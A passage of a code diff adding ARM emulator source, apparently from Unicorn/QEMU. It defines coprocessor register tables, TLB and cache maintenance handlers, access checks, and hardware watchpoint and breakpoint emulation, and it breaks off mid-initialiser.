+ */ + { "AMAIR0", 0,10,3, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST | ARM_CP_OVERRIDE, PL1_RW, NULL, 0 }, + /* AMAIR1 is mapped to AMAIR_EL1[63:32] */ + { "AMAIR1", 15,10,3, 0,0,1, 0, + ARM_CP_CONST | ARM_CP_OVERRIDE, PL1_RW, NULL, 0 }, + { "PAR", 15, 0,7, 0,0, 0, 0, + ARM_CP_64BIT, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.par_el1), }, + { "TTBR0", 15, 0,2, 0,0, 0, 0, + ARM_CP_64BIT | ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.ttbr0_el1), + NULL, NULL, vmsa_ttbr_write, NULL,NULL, arm_cp_reset_ignore }, + { "TTBR1", 15, 0,2, 0,1, 0, 0, + ARM_CP_64BIT | ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.ttbr1_el1), + NULL, NULL, vmsa_ttbr_write, NULL,NULL, arm_cp_reset_ignore }, + REGINFO_SENTINEL +}; + +static uint64_t aa64_fpcr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return vfp_get_fpcr(env); +} + +static void aa64_fpcr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + vfp_set_fpcr(env, value); +} + +static uint64_t aa64_fpsr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return vfp_get_fpsr(env); +} + +static void aa64_fpsr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + vfp_set_fpsr(env, value); +} + +static CPAccessResult aa64_daif_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + if (arm_current_el(env) == 0 && !(env->cp15.c1_sys & SCTLR_UMA)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static void aa64_daif_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->daif = value & PSTATE_DAIF; +} + +static CPAccessResult aa64_cacheop_access(CPUARMState *env, + const ARMCPRegInfo *ri) +{ + /* Cache invalidate/clean: NOP, but EL0 must UNDEF unless + * SCTLR_EL1.UCI is set. 
+ */ + if (arm_current_el(env) == 0 && !(env->cp15.c1_sys & SCTLR_UCI)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +/* See: D4.7.2 TLB maintenance requirements and the TLB maintenance instructions + * Page D4-1736 (DDI0487A.b) + */ + +static void tlbi_aa64_va_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate by VA (AArch64 version) */ + ARMCPU *cpu = arm_env_get_cpu(env); + uint64_t pageaddr = sextract64(value << 12, 0, 56); + + tlb_flush_page(CPU(cpu), pageaddr); +} + +static void tlbi_aa64_vaa_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate by VA, all ASIDs (AArch64 version) */ + ARMCPU *cpu = arm_env_get_cpu(env); + uint64_t pageaddr = sextract64(value << 12, 0, 56); + + tlb_flush_page(CPU(cpu), pageaddr); +} + +static void tlbi_aa64_asid_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate by ASID (AArch64 version) */ + ARMCPU *cpu = arm_env_get_cpu(env); + int asid = extract64(value, 48, 16); + tlb_flush(CPU(cpu), asid == 0); +} + +static void tlbi_aa64_va_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //uint64_t pageaddr = sextract64(value << 12, 0, 56); + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, pageaddr); +} + +static void tlbi_aa64_vaa_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //uint64_t pageaddr = sextract64(value << 12, 0, 56); + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, pageaddr); +} + +static void tlbi_aa64_asid_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //int asid = extract64(value, 48, 16); + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, asid == 0); +} + +static CPAccessResult aa64_zva_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* We don't implement EL2, so the only control on DC ZVA is the + * bit in the SCTLR which 
can prohibit access for EL0. + */ + if (arm_current_el(env) == 0 && !(env->cp15.c1_sys & SCTLR_DZE)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static uint64_t aa64_dczid_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int dzp_bit = 1 << 4; + + /* DZP indicates whether DC ZVA access is allowed */ + if (aa64_zva_access(env, NULL) == CP_ACCESS_OK) { + dzp_bit = 0; + } + return cpu->dcz_blocksize | dzp_bit; +} + +static CPAccessResult sp_el0_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + if (!(env->pstate & PSTATE_SP)) { + /* Access to SP_EL0 is undefined if it's being used as + * the stack pointer. + */ + return CP_ACCESS_TRAP_UNCATEGORIZED; + } + return CP_ACCESS_OK; +} + +static uint64_t spsel_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + return env->pstate & PSTATE_SP; +} + +static void spsel_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t val) +{ + update_spsel(env, val); +} + +static const ARMCPRegInfo v8_cp_reginfo[] = { + /* Minimal set of EL0-visible registers. This will need to be expanded + * significantly for system emulation of AArch64 CPUs. 
+ */ + { "NZCV", 0,4,2, 3,3,0, ARM_CP_STATE_AA64, + ARM_CP_NZCV, PL0_RW, }, + { "DAIF", 0,4,2, 3,3,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL0_RW, NULL, 0, offsetof(CPUARMState, daif), + aa64_daif_access, NULL, aa64_daif_write, NULL,NULL, arm_cp_reset_ignore }, + { "FPCR", 0,4,4, 3,3,0, ARM_CP_STATE_AA64, + 0, PL0_RW, NULL, 0, 0, + NULL, aa64_fpcr_read, aa64_fpcr_write }, + { "FPSR", 0,4,4, 3,3,1, ARM_CP_STATE_AA64, + 0, PL0_RW, NULL, 0, 0, + NULL, aa64_fpsr_read, aa64_fpsr_write }, + { "DCZID_EL0", 0,0,0, 3,3,7, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL0_R, NULL, 0, 0, + NULL, aa64_dczid_read }, + { "DC_ZVA", 0,7,4, 1,3,1, ARM_CP_STATE_AA64, + ARM_CP_DC_ZVA, PL0_W, NULL, 0, 0, +#ifndef CONFIG_USER_ONLY + /* Avoid overhead of an access check that always passes in user-mode */ + aa64_zva_access, +#endif + }, + { "CURRENTEL", 0,4,2, 3,0,2, ARM_CP_STATE_AA64, + ARM_CP_CURRENTEL, PL1_R, }, + /* Cache ops: all NOPs since we don't emulate caches */ + { "IC_IALLUIS", 0,7,1, 1,0,0, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + { "IC_IALLU", 0,7,5, 1,0,0, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + { "IC_IVAU", 0,7,5, 1,3,1, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL0_W, NULL, 0, 0, + aa64_cacheop_access }, + { "DC_IVAC", 0,7,6, 1,0,1, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + { "DC_ISW", 0,7,6, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + { "DC_CVAC", 0,7,10, 1,3,1, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL0_W, NULL, 0, 0, + aa64_cacheop_access }, + { "DC_CSW", 0,7,10, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + { "DC_CVAU", 0,7,11, 1,3,1, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL0_W, NULL, 0, 0, + aa64_cacheop_access }, + { "DC_CIVAC", 0,7,14, 1,3,1, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL0_W, NULL, 0, 0, + aa64_cacheop_access }, + { "DC_CISW", 0,7,14, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NOP, PL1_W, }, + /* TLBI operations */ + { "TLBI_VMALLE1IS", 0,8,3, 1,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_is_write }, + { "TLBI_VAE1IS", 
0,8,3, 1,0,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_va_is_write }, + { "TLBI_ASIDE1IS", 0,8,3, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_asid_is_write }, + { "TLBI_VAAE1IS", 0,8,3, 1,0,3, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_vaa_is_write }, + { "TLBI_VALE1IS", 0,8,3, 1,0,5, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_va_is_write }, + { "TLBI_VAALE1IS", 0,8,3, 1,0,7, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_vaa_is_write }, + { "TLBI_VMALLE1", 0,8,7, 1,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_write }, + { "TLBI_VAE1", 0,8,7, 1,0,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_va_write }, + { "TLBI_ASIDE1", 0,8,7, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_asid_write }, + { "TLBI_VAAE1", 0,8,7, 1,0,3, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_vaa_write }, + { "TLBI_VALE1", 0,8,7, 1,0,5, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_va_write }, + { "TLBI_VAALE1", 0,8,7, 1,0,7, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbi_aa64_vaa_write }, +#ifndef CONFIG_USER_ONLY + /* 64 bit address translation operations */ + { "AT_S1E1R", 0,7,8, 1,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, ats_write }, + { "AT_S1E1W", 0,7,8, 1,0,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, ats_write }, + { "AT_S1E0R", 0,7,8, 1,0,2, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, ats_write }, + { "AT_S1E0W", 0,7,8, 1,0,3, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, ats_write }, +#endif + /* TLB invalidate last level of translation 
table walk */ + { "TLBIMVALIS", 15,8,3, 0,0,5, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_is_write }, + { "TLBIMVAALIS", 15,8,3, 0,0,7, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimvaa_is_write }, + { "TLBIMVAL", 15,8,7, 0,0,5, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_write }, + { "TLBIMVAAL", 15,8,7, 0,0,7, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimvaa_write }, + /* 32 bit cache operations */ + { "ICIALLUIS", 15,7,1, 0,0,0, 0, + ARM_CP_NOP, PL1_W }, + { "BPIALLUIS", 15,7,1, 0,0,6, 0, + ARM_CP_NOP, PL1_W }, + { "ICIALLU", 15,7,5, 0,0,0, 0, + ARM_CP_NOP, PL1_W }, + { "ICIMVAU", 15,7,5, 0,0,1, 0, + ARM_CP_NOP, PL1_W }, + { "BPIALL", 15,7,5, 0,0,6, 0, + ARM_CP_NOP, PL1_W }, + { "BPIMVA", 15,7,5, 0,0,7, 0, + ARM_CP_NOP, PL1_W }, + { "DCIMVAC", 15,7,6, 0,0,1, 0, + ARM_CP_NOP, PL1_W }, + { "DCISW", 15,7,6, 0,0,2, 0, + ARM_CP_NOP, PL1_W }, + { "DCCMVAC", 15,7,10, 0,0,1, 0, + ARM_CP_NOP, PL1_W }, + { "DCCSW", 15,7,10, 0,0,2, 0, + ARM_CP_NOP, PL1_W }, + { "DCCMVAU", 15,7,11, 0,0,1, 0, + ARM_CP_NOP, PL1_W }, + { "DCCIMVAC", 15,7,14, 0,0,1, 0, + ARM_CP_NOP, PL1_W }, + { "DCCISW", 15,7,14, 0,0,2, 0, + ARM_CP_NOP, PL1_W }, + /* MMU Domain access control / MPU write buffer control */ + { "DACR", 15,3,0, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c3), + NULL, NULL,dacr_write, NULL,raw_write, }, + { "ELR_EL1", 0,4,0, 3,0,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, elr_el[1]) }, + { "SPSR_EL1", 0,4,0, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, banked_spsr[0]) }, + /* We rely on the access checks not allowing the guest to write to the + * state field when SPSel indicates that it's being used as the stack + * pointer. 
+ */ + { "SP_EL0", 0,4,1, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, sp_el[0]), + sp_el0_access, }, + { "SPSel", 0,4,2, 3,0,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, 0, + NULL, spsel_read, spsel_write }, + REGINFO_SENTINEL +}; + +/* Used to describe the behaviour of EL2 regs when EL2 does not exist. */ +static const ARMCPRegInfo v8_el3_no_el2_cp_reginfo[] = { + { "VBAR_EL2", 0,12,0, 3,4,0, ARM_CP_STATE_AA64, + 0, PL2_RW, NULL, 0, 0, + NULL, arm_cp_read_zero, arm_cp_write_ignore }, + { "HCR_EL2", 0,1,1, 3,4,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL2_RW, NULL, 0, 0, + NULL, arm_cp_read_zero, arm_cp_write_ignore }, + REGINFO_SENTINEL +}; + +static void hcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + uint64_t valid_mask = HCR_MASK; + + if (arm_feature(env, ARM_FEATURE_EL3)) { + valid_mask &= ~HCR_HCD; + } else { + valid_mask &= ~HCR_TSC; + } + + /* Clear RES0 bits. 
*/ + value &= valid_mask; + + /* These bits change the MMU setup: + * HCR_VM enables stage 2 translation + * HCR_PTW forbids certain page-table setups + * HCR_DC Disables stage1 and enables stage2 translation + */ + if ((raw_read(env, ri) ^ value) & (HCR_VM | HCR_PTW | HCR_DC)) { + tlb_flush(CPU(cpu), 1); + } + raw_write(env, ri, value); +} + +static const ARMCPRegInfo v8_el2_cp_reginfo[] = { + { "HCR_EL2", 0,1,1, 3,4,0, ARM_CP_STATE_AA64, + 0, PL2_RW, NULL, 0, offsetof(CPUARMState, cp15.hcr_el2), + NULL, NULL, hcr_write }, + { "ELR_EL2", 0,4,0, 3,4,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL2_RW, NULL, 0, offsetof(CPUARMState, elr_el[2]) }, + { "ESR_EL2", 0,5,2, 3,4,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL2_RW, NULL, 0, offsetof(CPUARMState, cp15.esr_el[2]) }, + { "FAR_EL2", 0,6,0, 3,4,0, ARM_CP_STATE_AA64, + 0, PL2_RW, NULL, 0, offsetof(CPUARMState, cp15.far_el[2]) }, + { "SPSR_EL2", 0,4,0, 3,4,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL2_RW, NULL, 0, offsetof(CPUARMState, banked_spsr[6]) }, + { "VBAR_EL2", 0,12,0, 3,4,0, ARM_CP_STATE_AA64, + 0, PL2_RW, NULL, 0, offsetof(CPUARMState, cp15.vbar_el[2]), + NULL, NULL, vbar_write, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo v8_el3_cp_reginfo[] = { + { "ELR_EL3", 0,4,0, 3,6,1, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL3_RW, NULL, 0, offsetof(CPUARMState, elr_el[3]) }, + { "ESR_EL3", 0,5,2, 3,6,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL3_RW, NULL, 0, offsetof(CPUARMState, cp15.esr_el[3]) }, + { "FAR_EL3", 0,6,0, 3,6,0, ARM_CP_STATE_AA64, + 0, PL3_RW, NULL, 0, offsetof(CPUARMState, cp15.far_el[3]) }, + { "SPSR_EL3", 0,4,0, 3,6,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL3_RW, NULL, 0, offsetof(CPUARMState, banked_spsr[7]) }, + { "VBAR_EL3", 0,12,0, 3,6,0, ARM_CP_STATE_AA64, + 0, PL3_RW, NULL, 0, offsetof(CPUARMState, cp15.vbar_el[3]), + NULL, NULL, vbar_write, }, + { "SCR_EL3", 0,1,1, 3,6,0, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL3_RW, NULL, 0, offsetof(CPUARMState, cp15.scr_el3), + NULL, 
NULL, scr_write }, + REGINFO_SENTINEL +}; + +static void sctlr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + if (raw_read(env, ri) == value) { + /* Skip the TLB flush if nothing actually changed; Linux likes + * to do a lot of pointless SCTLR writes. + */ + return; + } + + raw_write(env, ri, value); + /* ??? Lots of these bits are not implemented. */ + /* This may enable/disable the MMU, so do a TLB flush. */ + tlb_flush(CPU(cpu), 1); +} + +static CPAccessResult ctr_el0_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Only accessible in EL0 if SCTLR.UCT is set (and only in AArch64, + * but the AArch32 CTR has its own reginfo struct) + */ + if (arm_current_el(env) == 0 && !(env->cp15.c1_sys & SCTLR_UCT)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static const ARMCPRegInfo debug_cp_reginfo[] = { + /* DBGDRAR, DBGDSAR: always RAZ since we don't implement memory mapped + * debug components. The AArch64 version of DBGDRAR is named MDRAR_EL1; + * unlike DBGDRAR it is never accessible from EL0. + * DBGDSAR is deprecated and must RAZ from v8 anyway, so it has no AArch64 + * accessor. + */ + { "DBGDRAR", 14,1,0, 0,0,0, 0, + ARM_CP_CONST, PL0_R, NULL, 0 }, + { "MDRAR_EL1", 0,1,0, 2,0,0, ARM_CP_STATE_AA64, + ARM_CP_CONST, PL1_R, NULL, 0 }, + { "DBGDSAR", 14,2,0, 0,0,0, 0, + ARM_CP_CONST, PL0_R, NULL, 0 }, + /* Monitor debug system control register; the 32-bit alias is DBGDSCRext. */ + { "MDSCR_EL1", 14,0,2, 2,0,2, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.mdscr_el1), }, + /* MDCCSR_EL0, aka DBGDSCRint. This is a read-only mirror of MDSCR_EL1. + * We don't implement the configurable EL0 access. + */ + { "MDCCSR_EL0", 14,0,1, 2,0,0, ARM_CP_STATE_BOTH, + ARM_CP_NO_MIGRATE, PL1_R, NULL, 0, offsetof(CPUARMState, cp15.mdscr_el1), + NULL,NULL,NULL,NULL,NULL, arm_cp_reset_ignore }, + /* We define a dummy WI OSLAR_EL1, because Linux writes to it. 
*/ + { "OSLAR_EL1", 14,1,0, 2,0,4, ARM_CP_STATE_BOTH, + ARM_CP_NOP, PL1_W, }, + /* Dummy OSDLR_EL1: 32-bit Linux will read this */ + { "OSDLR_EL1", 14,1,3, 2,0,4, ARM_CP_STATE_BOTH, + ARM_CP_NOP, PL1_RW, }, + /* Dummy DBGVCR: Linux wants to clear this on startup, but we don't + * implement vector catch debug events yet. + */ + { "DBGVCR", 14,0,7, 0,0,0, 0, + ARM_CP_NOP, PL1_RW, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo debug_lpae_cp_reginfo[] = { + /* 64 bit access versions of the (dummy) debug registers */ + { "DBGDRAR", 14, 0,1, 0,0, 0, 0, + ARM_CP_CONST|ARM_CP_64BIT, PL0_R, NULL, 0 }, + { "DBGDSAR", 14, 0,2, 0,0, 0, 0, + ARM_CP_CONST|ARM_CP_64BIT, PL0_R, NULL, 0 }, + REGINFO_SENTINEL +}; + +void hw_watchpoint_update(ARMCPU *cpu, int n) +{ + CPUARMState *env = &cpu->env; + vaddr len = 0; + vaddr wvr = env->cp15.dbgwvr[n]; + uint64_t wcr = env->cp15.dbgwcr[n]; + int mask; + int flags = BP_CPU | BP_STOP_BEFORE_ACCESS; + + if (env->cpu_watchpoint[n]) { + cpu_watchpoint_remove_by_ref(CPU(cpu), env->cpu_watchpoint[n]); + env->cpu_watchpoint[n] = NULL; + } + + if (!extract64(wcr, 0, 1)) { + /* E bit clear : watchpoint disabled */ + return; + } + + switch (extract64(wcr, 3, 2)) { + case 0: + /* LSC 00 is reserved and must behave as if the wp is disabled */ + return; + case 1: + flags |= BP_MEM_READ; + break; + case 2: + flags |= BP_MEM_WRITE; + break; + case 3: + flags |= BP_MEM_ACCESS; + break; + } + + /* Attempts to use both MASK and BAS fields simultaneously are + * CONSTRAINED UNPREDICTABLE; we opt to ignore BAS in this case, + * thus generating a watchpoint for every byte in the masked region. + */ + mask = extract64(wcr, 24, 4); + if (mask == 1 || mask == 2) { + /* Reserved values of MASK; we must act as if the mask value was + * some non-reserved value, or as if the watchpoint were disabled. + * We choose the latter. 
+ */ + return; + } else if (mask) { + /* Watchpoint covers an aligned area up to 2GB in size */ + len = 1ULL << mask; + /* If masked bits in WVR are not zero it's CONSTRAINED UNPREDICTABLE + * whether the watchpoint fires when the unmasked bits match; we opt + * to generate the exceptions. + */ + wvr &= ~(len - 1); + } else { + /* Watchpoint covers bytes defined by the byte address select bits */ + int bas = extract64(wcr, 5, 8); + int basstart; + + if (bas == 0) { + /* This must act as if the watchpoint is disabled */ + return; + } + + if (extract64(wvr, 2, 1)) { + /* Deprecated case of an only 4-aligned address. BAS[7:4] are + * ignored, and BAS[3:0] define which bytes to watch. + */ + bas &= 0xf; + } + /* The BAS bits are supposed to be programmed to indicate a contiguous + * range of bytes. Otherwise it is CONSTRAINED UNPREDICTABLE whether + * we fire for each byte in the word/doubleword addressed by the WVR. + * We choose to ignore any non-zero bits after the first range of 1s. + */ + basstart = ctz32(bas); + len = cto32(bas >> (basstart & 0x1f)); + wvr += basstart; + } + + cpu_watchpoint_insert(CPU(cpu), wvr, len, flags, + &env->cpu_watchpoint[n]); +} + +void hw_watchpoint_update_all(ARMCPU *cpu) +{ + int i; + CPUARMState *env = &cpu->env; + + /* Completely clear out existing QEMU watchpoints and our array, to + * avoid possible stale entries following migration load. + */ + cpu_watchpoint_remove_all(CPU(cpu), BP_CPU); + memset(env->cpu_watchpoint, 0, sizeof(env->cpu_watchpoint)); + + for (i = 0; i < ARRAY_SIZE(cpu->env.cpu_watchpoint); i++) { + hw_watchpoint_update(cpu, i); + } +} + +static void dbgwvr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int i = ri->crm; + + /* Bits [63:49] are hardwired to the value of bit [48]; that is, the + * register reads and behaves as if values written are sign extended. + * Bits [1:0] are RES0. 
+ */ + value = sextract64(value, 0, 49) & ~3ULL; + + raw_write(env, ri, value); + hw_watchpoint_update(cpu, i); +} + +static void dbgwcr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int i = ri->crm; + + raw_write(env, ri, value); + hw_watchpoint_update(cpu, i); +} + +void hw_breakpoint_update(ARMCPU *cpu, int n) +{ + CPUARMState *env = &cpu->env; + uint64_t bvr = env->cp15.dbgbvr[n]; + uint64_t bcr = env->cp15.dbgbcr[n]; + vaddr addr; + int bt; + int flags = BP_CPU; + + if (env->cpu_breakpoint[n]) { + cpu_breakpoint_remove_by_ref(CPU(cpu), env->cpu_breakpoint[n]); + env->cpu_breakpoint[n] = NULL; + } + + if (!extract64(bcr, 0, 1)) { + /* E bit clear : watchpoint disabled */ + return; + } + + bt = extract64(bcr, 20, 4); + + switch (bt) { + case 4: /* unlinked address mismatch (reserved if AArch64) */ + case 5: /* linked address mismatch (reserved if AArch64) */ + qemu_log_mask(LOG_UNIMP, + "arm: address mismatch breakpoint types not implemented"); + return; + case 0: /* unlinked address match */ + case 1: /* linked address match */ + { + /* Bits [63:49] are hardwired to the value of bit [48]; that is, + * we behave as if the register was sign extended. Bits [1:0] are + * RES0. The BAS field is used to allow setting breakpoints on 16 + * bit wide instructions; it is CONSTRAINED UNPREDICTABLE whether + * a bp will fire if the addresses covered by the bp and the addresses + * covered by the insn overlap but the insn doesn't start at the + * start of the bp address range. We choose to require the insn and + * the bp to have the same address. The constraints on writing to + * BAS enforced in dbgbcr_write mean we have only four cases: + * 0b0000 => no breakpoint + * 0b0011 => breakpoint on addr + * 0b1100 => breakpoint on addr + 2 + * 0b1111 => breakpoint on addr + * See also figure D2-3 in the v8 ARM ARM (DDI0487A.c). 
+ */ + int bas = extract64(bcr, 5, 4); + addr = sextract64(bvr, 0, 49) & ~3ULL; + if (bas == 0) { + return; + } + if (bas == 0xc) { + addr += 2; + } + break; + } + case 2: /* unlinked context ID match */ + case 8: /* unlinked VMID match (reserved if no EL2) */ + case 10: /* unlinked context ID and VMID match (reserved if no EL2) */ + qemu_log_mask(LOG_UNIMP, + "arm: unlinked context breakpoint types not implemented"); + return; + case 9: /* linked VMID match (reserved if no EL2) */ + case 11: /* linked context ID and VMID match (reserved if no EL2) */ + case 3: /* linked context ID match */ + default: + /* We must generate no events for Linked context matches (unless + * they are linked to by some other bp/wp, which is handled in + * updates for the linking bp/wp). We choose to also generate no events + * for reserved values. + */ + return; + } + + cpu_breakpoint_insert(CPU(cpu), addr, flags, &env->cpu_breakpoint[n]); +} + +void hw_breakpoint_update_all(ARMCPU *cpu) +{ + int i; + CPUARMState *env = &cpu->env; + + /* Completely clear out existing QEMU breakpoints and our array, to + * avoid possible stale entries following migration load. + */ + cpu_breakpoint_remove_all(CPU(cpu), BP_CPU); + memset(env->cpu_breakpoint, 0, sizeof(env->cpu_breakpoint)); + + for (i = 0; i < ARRAY_SIZE(cpu->env.cpu_breakpoint); i++) { + hw_breakpoint_update(cpu, i); + } +} + +static void dbgbvr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int i = ri->crm; + + raw_write(env, ri, value); + hw_breakpoint_update(cpu, i); +} + +static void dbgbcr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + int i = ri->crm; + + /* BAS[3] is a read-only copy of BAS[2], and BAS[1] a read-only + * copy of BAS[0]. 
+ */ + value = deposit64(value, 6, 1, extract64(value, 5, 1)); + value = deposit64(value, 8, 1, extract64(value, 7, 1)); + + raw_write(env, ri, value); + hw_breakpoint_update(cpu, i); +} + +static void define_debug_regs(ARMCPU *cpu) +{ + /* Define v7 and v8 architectural debug registers. + * These are just dummy implementations for now. + */ + int i; + int wrps, brps, ctx_cmps; + ARMCPRegInfo dbgdidr = { + "DBGDIDR", 14,0,0, 0,0,0, 0, + ARM_CP_CONST, PL0_R, NULL, cpu->dbgdidr, + }; + + /* Note that all these register fields hold "number of Xs minus 1". */ + brps = extract32(cpu->dbgdidr, 24, 4); + wrps = extract32(cpu->dbgdidr, 28, 4); + ctx_cmps = extract32(cpu->dbgdidr, 20, 4); + + assert(ctx_cmps <= brps); + + /* The DBGDIDR and ID_AA64DFR0_EL1 define various properties + * of the debug registers such as number of breakpoints; + * check that if they both exist then they agree. + */ + if (arm_feature(&cpu->env, ARM_FEATURE_AARCH64)) { + assert(extract32(cpu->id_aa64dfr0, 12, 4) == brps); + assert(extract32(cpu->id_aa64dfr0, 20, 4) == wrps); + assert(extract32(cpu->id_aa64dfr0, 28, 4) == ctx_cmps); + } + + define_one_arm_cp_reg(cpu, &dbgdidr); + define_arm_cp_regs(cpu, debug_cp_reginfo); + + if (arm_feature(&cpu->env, ARM_FEATURE_LPAE)) { + define_arm_cp_regs(cpu, debug_lpae_cp_reginfo); + } + + for (i = 0; i < brps + 1; i++) { + ARMCPRegInfo dbgregs[] = { + { "DBGBVR", 14,0,i, 2,0,4,ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.dbgbvr[i]), + NULL, NULL,dbgbvr_write, NULL,raw_write + }, + { "DBGBCR", 14,0,i, 2,0,5, 